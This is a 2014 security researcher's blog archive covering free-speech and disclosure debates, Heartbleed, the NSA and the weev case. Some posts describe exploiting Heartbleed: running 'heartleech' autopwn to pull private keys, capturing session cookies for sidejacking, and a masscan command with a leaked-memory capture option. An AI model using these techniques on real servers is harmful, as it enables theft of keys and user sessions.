Friday, April 18, 2014

xkcd is wrong about "free speech"

The usually awesome XKCD cartoon opines that "the right to free speech means only that the government cannot arrest you for what you say". This is profoundly wrong in every way that something can be wrong.

The First Amendment to the constitution says that "Congress shall pass no law abridging freedom of speech". This wording is important. It doesn't say that congress shall pass laws protecting our speech, but that congress shall not abridge it. "Free speech" is not a right given to us by government. Instead, "free speech" is a right we have -- the stipulation is only that government should not infringe it.

The forces that want to restrict your speech include others than just government. For example, cartoonists around the world draw pictures of Jesus and Buddha, but do not draw pictures of Mohamed, because they are afraid of being murdered by Islamic fundamentalists. South Park depicted Jesus as addicted to Internet porn, and Buddha with a cocaine habit, but the censors forced them to cover up a totally innocuous picture of Mohamed. It's a free-speech issue, but not one that involves government.

In oppressive countries like Russia, the threats to speech rarely come directly from the government. It's not the police arresting people for speech. Instead, it's the local young thugs beating up journalists, with the police looking the other way.

In the United States, society has gone overboard on "political correctness" that silences speech. A good example in cybersec community is when the "Ada Initiative" got that talk canceled at "BSidesSF" last year. That sort of thing is very much a "free speech" issue, even though the official government wasn't involved.

The "responsible-disclosure" debate is about "free-speech", where some try to use the hammer of "ethical behavior" to control speech. Last night I tweeted a line of code from the OpenSSL source code that demonstrates a hilariously funny bug. I was attacked for my speech from OpenSSL defenders who want me to quietly submit bug patches rather than making OpenSSL look bad on Twitter.

That's why so many of us oppose the idea of "responsible-disclosure" -- the principle of "free-speech" means "free-disclosure". If you've found a vulnerability, keep it secret, sell it, notify the vendor, notify the press, do whatever the heck you want to do with it. Only "free-disclosure" advances security -- "responsible" disclosure that tries to control the process holds back security.

Such debates do circle back to government. For example, in the Andrew 'weev' Auernheimer case, the government cited Andrew's behavior (notifying the press) as an example of irresponsible behavior, because it didn't fit within the white-hat security norms of "responsible-disclosure". Andrew was sent to jail for speech that embarrassed the powerful -- and it was your anti-free-speech arguments of "responsible-disclosure" that helped put him there.


Certainly, it's technically inaccurate to cite "First Amendment" rights universally, as that's only a restriction on government. But the "free speech" is distinct: you can certainly cite your "right to free speech" in cases that have nothing to do with government.


Update: I shoulda just started this post by citing the Wikipedia entry on rights: "Rights are legal, social, or ethical principles of freedom". In other words, it's perfectly valid to use the word "right" in contexts other than "legal".

Update: I mention South Park because the XKCD mentions "when your show gets canceled". If your show gets canceled because nobody watches it, then that's certainly not a free-speech issue. But, when your show gets canceled because of threats from Islamists, then it certainly is a free-speech issue.

Monday, April 14, 2014

Heartbleed: I'm thinking BIGNUM

On Friday night, I started up my 'heartleech' program slurping down data from www.cloudflarechallenge.com at 30-mbps, then went to bed. The next day, I had over 100-gigabytes of data, but I couldn't find the private key. What was the bug in my code that prevented me from finding it? I spent two days trying to solve this problem, it was very frustrating.

The answer was "byte-order". I was looking for the prime factor in the same way that it'd appear in a DER0-encoded file, which is "big-endian". Instead, the way to look for the key is in little-endian format.

I've misread the OpenSSL code before, but my feeling is that this comes from the "BIGNUM" representation in OpenSSL. RSA key and it's constituent factors are all just integers that are thousands of bits long. Because they don't fit in normal 64-bit integers, they require a special library to manipulate them. The big-endian byte arrays are extracted from the private key file, then converted into the internal representation, at which point you can call functions to add, subtract, multiply, and so on.

The internal representation for OpenSSL is as a series of integers, with low-order integers first. Since the integers on Intel x86 are also little-endian, this means that the internal representation is just byte-swapped from the external form. This would not be the case on something like Solaris SPARC, which has big-endian integers. OpenSSL still stores the array of integers least-significant first, but each integer itself will be big-endian.

My guess is that the reason we can find the prime factors is that there is some BIGNUM memory sitting around that shouldn't be.

What's really annoying is that I started down this BIGNUM path, but then some other people won the www.cloudeflarechallenge.com using Python scripts. I therefore made the assumption that Python used an external big-endian form, so I chose that instead. I then tested my code and successfully found the prime factors when reading from DER encoded private key files. So I knew my code was correct. But then my code didn't find the prime factors in the data I dumped from CloudFlare. Moreover, I couldn't test their Python scripts, because the files I created from the dumps were 13-gigs in size. Their scripts would first read in the entire file before parsing it -- and would barf at 13-gigs. I have some small 400-meg files -- but none of them contain the key. Sigh.



CloudFlare Challenge writeup

Last week, I made an embarrassing mistake. I misread the OpenSSL code and claimed getting the private-key would be unlikely. This was wrong on so many levels.

Well, today I'm demonstrating the opposite, that anybody can easily get a private-key. Just run my "heartleech" program with the "-a" (autopwn) against a server, go away from your computer for many hours, and when you come back, you'll have the key.

CloudFlare has been nice enough to put up an unpatched server, challenging people to get it's key. This is easy with the autopwn feature of heartleech, as shown in this screenshot.


Friday, April 11, 2014

No, the NSA didn't make us less secure (heartbleed)

According to a Bloomberg story, the NSA has known about the #heartbleed bug from the moment it was written, presumably because they analyze commits to security packages looking for such bugs. Many have opined that this makes us less safe.

It doesn't. The NSA didn't create the hole. They didn't hinder any other researcher from finding it. If the NSA wasn't looking for the bug, the outcome would be the same.

Finding such bugs and keeping them quiet is wholly within the NSA's mission statement. Their job is to spy on foreigners and keep state secrets safe. Generally, state secrets aren't on machines exposed to the Internet, so keeping the bug secret had no impact on that.

Many think the NSA should do a different job than commanded by the President. That's called "treason". That the NSA, CIA, and the military do exactly what they are told is what distinguishes them from other agencies. Former military head Robert Gates pointed that out in his recent memoir: the reason Presidents like Obama love the military and intelligence agencies is that they are the only groups who do what they are told. There are many problems with the NSA, but that they stay on mission isn't one of them.

Maybe we should have a government agency dedicated to critical cyber infrastructure protection, whose job it would be to find and fix such bugs. Maybe we ought to have a government agency that looks at every commit to the OpenSSL source code, notifying the developers of any problems they find. In theory, the DHS already does that, but of course they are hapless with regards to cybersecurity.

There are reasons to be critical of the NSA. They pay for vulnerabilities, raising the market price of bounties responsible companies like Google have to pay. They hire away talent to look for vulnerabilities, leaving fewer talented people outside the NSA. So in that way, they make everyone else less safe. But the same thing happens elsewhere. After the worms of around 2003, Microsoft hired more than half the talented researchers in the industry, either directly or through consultants, which had the effect of making everyone else less secure. Today, Google and Apple employ lots of talented researchers. The distortions that the NSA causes in the market is less than private enterprise.

The reason to hate the NSA is not because they are following their mission, it's because their mission has creeped to include surveilling American citizens. We need to stop making them the bogyman in every story and focus on the real reasons to hate them.


Weev freed (for now)

The court has overturned the Weev conviction, but on the question of venue not the vague language of the CFAA. This is actually just as important. I discuss the "Venue Question" in this blog post about the appeal. Orin Kerr has his description here.

If we are lucky, Weev'll get retried in California, where the hack occurred, and we'll get the crazy Judge Kozinski to rule on the vagueness of the CFAA.

Wednesday, April 09, 2014

No, we weren't scanning for hearbleed before April 7

This webpage claims that people were scanning for #heartbleed before the April 7 disclosure of the bug. I doubt it. It was probably just masscan.

The trick with masscan, which makes it different from all other scanners, is that it has a custom TCP/IP stack and a custom SSL stack. When it scans a machine for SSL, it abruptly terminates the connection in the middle of the handshake. This causes no problems, but it's unusual, so servers log it.

The #heartbleed scanners have even less SSL. They just dump raw bytes on the wire and pattern-match the result. They, too, abruptly terminate the connection in the middle of handshaking, causing the same server log messages.

Masscan is really good at doing SSL surveys of the entire Internet, and a lot of people have been using it for that. The tool is only 6 months old, so it's something new in your logs. Two new things producing the same error messages might seem like the two are correlated, but of course, they aren't.


Why heartbleed doesn't leak the private key [retracted]

I got this completely wrong!

So as it turns out, I completely messed up reading the code. I don't see how, but I read it one way. I can still visualize the code in my mind's eye that I thought I read -- but it's not the real code. I thought it worked one way, but it works another way.

Private keys are still not so likely to be exposed, but still much more likely than my original analysis suggested.

600,000 servers vulnerable to heartbleed

Just an update on "HeartBleed". Yesterday I updated my "masscan" program to scan for it, and last night we scanned the Internet. We found 28,581,134 machines (28-million) that responded with a valid SSL connection. Of those, only 615,268 (600-thousand) were vulnerable to the HeartBleed bug. We also found 330,531 (300-thousand) machines that had heartbeats enabled, but which did not respond to the heartbleed attack. Presumably, this means a third of machines had been patched by the time we ran the scan last night.

Update: Some people have described this as "only 2% vulnerable". That's an unfair way of describing it. We scanned IP addresses. There are millions of IP addresses where port 443 traffic is redirected to a single load balancer. This throws off our counts.

Yes, you might have to change some passwords (#heartbleed)

There is some debate over whether this "HeartBleed" bug means you have to change your password. It might.

The HeartBleed bug grabs some random bits of memory. If a hacker wrote a script that would repeatedly query "login.yahoo.com" a thousand times per second, they'd probably get a hundred usernames/passwords per second.

Usernames and passwords go in HTTP requests just like cookies and URLs. If one is exposed, then so is the other. As I posted yesterday, here is a picture of grabbing part of a session cookie from a real website (Flickr, one of Yahoo's properties):


Luckily, sessions remain open for weeks, but the bug was only open for a couple of days. The only passwords you need to change would be ones that you entered in the last couple of days. Personally, I haven't entered any passwords over the last couple days, so I don't need to change any passwords.

At most, since hackers could have stolen the session cookies, you might want to log out and relogin to sessions on vulnerable servers.



From this article:
"I would change every password everywhere because it's possible something was sniffed out," said Wolfgang Kandek, chief technology officer for Qualys
This is nonsense. If you didn't type in your password over the last few days, then you are likely safe. I've got hundreds of accounts, I'm changing none of them, because I didn't have to relogin over the last few days. I had persistent sessions.

Tuesday, April 08, 2014

Using masscan to scan for heartbleed vulnerability

I've updated my port scanner, "masscan", to specifically look for Neel Mehta's "HeartBleed" vulnerability. Masscan is good for scanning very large networks (like the network).

Remember that the trick with masscan is that it has its own TCP/IP stack. This means that on Linux and Mac OS X (but not Windows), the operating system will send back RST packets in acknowledgement to a SYN-ACK. Therefore, on Linux, you have to either configure firewall rules to block out a range of ports that masscan can use without generating resets, or better yet, just set masscan to "spoof" an otherwise unused IP address on the local network.

Here is how you might use it:

masscan 10.0.0.0/8 -p443 -S 10.1.2.53 --rate 100000 --heartbleed

This translates to:

  • 10.0.0.0/8 = the network you want to scan, which is all 10.x.x.x
  • -p443 = the port(s) you want to scan, in this case, the ones assigned to SSL
  • -S 10.1.2.53 = an otherwise unused local IP address to scan from
  • --rate 100000 = 100-packets/second, which scans the entire Class A range in a few minutes
  • --heartbleed = the new option that reconfigures masscan to look for this vulnerability


The output on the command-line will look like the following:

Discovered open port 443/tcp on 10.20.30.143
Banner on port 443/tcp on 10.20.30.143: [ssl] cipher:0xc014
Banner on port 443/tcp on 10.20.30.143: [vuln] SSL[heartbeat] SSL[HEARTBLEED]

There are three pieces of output for each IP address. The first is that the open port exists (the scanner received a SYN-ACK). The second is that the SSL exists, that the scanner was able to get back a reasonable SSL result (reporting which cipher suite it's using). The third line is the "vulnerability" information the scanner found. In this case, it's found two separate vulnerabilities. The first is that SSL "heartbeats" are enabled, which really isn't a vulnerability, but something some people might want to remove from their network. The second is the important part, notifying you that that the "HEARTBLEED" vulnerability exists (in all caps, 'cause it's important).

Some researchers would like to capture the bled (disclosed) information. To do that, add the option "--capture heartbleed" to the command-line. This will add a fourth line of output per IP address:

Banner on port 443/tcp on 10.20.30.143: [heartbleed] AwJTQ1uQnZtyC7wMvCuSqEiXz705BMwWCoUDkJ93BDPU...

This line will be BASE64 encoded, and be many kilobytes in size (I think masscan truncates it to the first 4k).




What the heartbleed bug looks like on the wire

The "heartbleed" bug appears to grab "uninitialized memory". For typical web servers using OpenSSL, that likely means memory dealing with recent web requests. In the attached screen shot, we ran a test tool against Flickr (which is still vulnerable). Notice that it gives us a person's session cookie (which I've cropped here to avoid harming the innocent). By copying this cookie into a browser ("sidejacking") we can in theory gain temporary access to this person's account.

A picture of the packets sent to test/exploit the HeartBleed bug.
At the bottom, you see part of a person's session cookie.
I think for any particular connection, the chance of getting a "private key" is very low. But of course, if it's only a 1-in-a-million chance, then it's still too high, as attackers can create millions of connections to a server. Also, the impact for a large hosting site like Flickr would be huge, impacting hundreds of millions of connections. In other words, if "risk = likelihood * impact", then the risk of a private-key disclosure is the same as the risk of a cookie disclosure: the impact of disclosing the private-key effects all hundred million customers with a one-in-a-million likelihood, whereas the impact of a session key disclosure effects only one customer, with a greater than 50% chance per coonection.




Tuesday, April 01, 2014

New Service Offering from Errata Security: SATAN-as-A-Service

We have been collecting data on security breaches, vulnerabilities, and attitudes towards security. One conclusion we derived from analyzing this data is there were far less security problems, that we knew of, in 1995 than today. What is so different about today that 1995? One major difference is SATAN is not as widely used. The controversial security tool by notable cyber cafe attendees Dan Farmer and Wietse Venema.

We decided to take action:

Today we are announcing Satan-as-A-Service.


SATAN running on a deployable image of Kali Linux:




We are staying faithful to the original vision of SATAN. Ou first action will be to finish this TODO list:
TODO list for future (SATAN version 1.1, 2.0, whatever)
----------------------------------------------------------
o       Enable SATAN to fork and run several scans in parallel
o       Talk about sending mail/syslog to each host scanned
o       Look at and deal with subnet masks properly...
o       Put in a DNS walker
o       fix rex client strategy (rex client is currently not being used)
o       get a more complete list of banners from vendors and Internet
       on what is vulnerable and not, for the rules/* files.
o       many more bug tests, etc.
o       Add AFS testing support; currently there is none
o       Add SNMP testing/probing
And most importantly:
o       MAPS!  Big graphical maps that can *show* the relationships
       and are clickable to let users zoom into things, etc...

Thursday, March 27, 2014

A traditional cybersecurity company

Picture of the loft, from Space Rogue.
This is the tradition.
In the prosecutors' response to the Weev appeal, they make the snarky claim about Goatse security:
It is not, to put it mildly, a traditional security research company. The firm’s name is a reference to a notoriously obscene internet shock site. ...  Goatse Security’s corporate motto is “gaping holes exposed.” 
They are wrong. This is traditional, at least for security research companies. We start out as hobbyists having fun, not taking what we do seriously. We start wearing t-shirts and hoodies. Only as we grow older do we realize that people will pay serious money for this, and it becomes our formal job, where we might show up to meetings wearing a suit.